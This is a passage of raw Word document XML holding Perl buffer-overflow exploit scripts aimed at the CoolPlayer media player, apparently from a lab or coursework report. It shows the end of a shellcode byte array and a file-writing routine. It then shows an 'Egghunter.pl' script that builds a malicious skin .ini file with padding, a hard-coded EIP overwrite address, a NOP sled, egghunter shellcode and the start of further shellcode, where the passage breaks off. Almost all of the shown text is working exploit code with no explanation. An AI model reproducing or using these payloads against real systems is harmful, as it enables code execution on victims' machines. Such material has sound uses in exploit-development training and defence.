      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xb5\x1c\x33\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x3e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38B13E69" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x48\x82\xe1\x4b\x4a\x0b\x12\x68\x43\x6d\x62\x99\xe2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02B40895" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\xe6\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xbb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xe3\x6c\x9a\xc2\xf0\x4a\x62\x02\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x74\x6d\x62</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FB9E5B7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x74\x41\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xd3\x1c\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x71\xe0\x4b\x75\xa3\x41\x76\x30</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29AE700E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xe1\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xf4\x70\x58\x06\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xb6\x1d\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xd6\x93</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="240D9A03" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x0c\xe4\x92\xf3\x48\x72\xc4\xe1\x4a\x64\xc4\xf9\x4a\x74</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38DA1F29" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\xc1\xe1\x74\x5b\x5e\x88\x9a\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x47\x3e\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x6c\xc4\xf1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22EA38F8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\xe3\x12\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x9b\x3f\xf2\x48\xc9\x99\x62\x02\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x74</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E984A1A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x11\x89\x9f\x0f\x48\xc9\x1e\x94\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x16\xa2\x69\x57</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="035F9048" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x69\x27\x29\xf0\x0f\x50\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x1c\x71\x6d\x62</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="042EBC8D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10042F03" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B8C4C00" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>print $FILE $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>start.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>junk1.$eip.$nop.$shellcode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C6189" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>close($FILE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D468DD3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BBB551" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc71564026"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Egghunter.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="6A2799D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $file= "egghunter.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C46073B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $start="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75901D66" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34C4D063" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">my $junk1 = "\x41" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1051;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D7B2307" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = pack('V',0x7C86467B</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="77FBC52A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">my $nop1 = "\x90" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>64;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10C7E5C1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC5DC93" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ABEDD6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x66\x81\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x0f\x42\x52\x6a\x02\x58\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x2e\x3c\x05</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="12CFFCF1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x5a\x74\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xb8\x59\x45\x45\x54\x89\xd7\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x75\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="502766FE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x75\xe7\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xe7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="12A6F604" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A38C5D4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "\x90" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>200;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F0A2FB4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $tag = "YEETYEET</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24D4F67E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1900FB0B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $shellcode =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABA279" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x89\xe2\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xc8\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3484CEC1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65FC90F0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
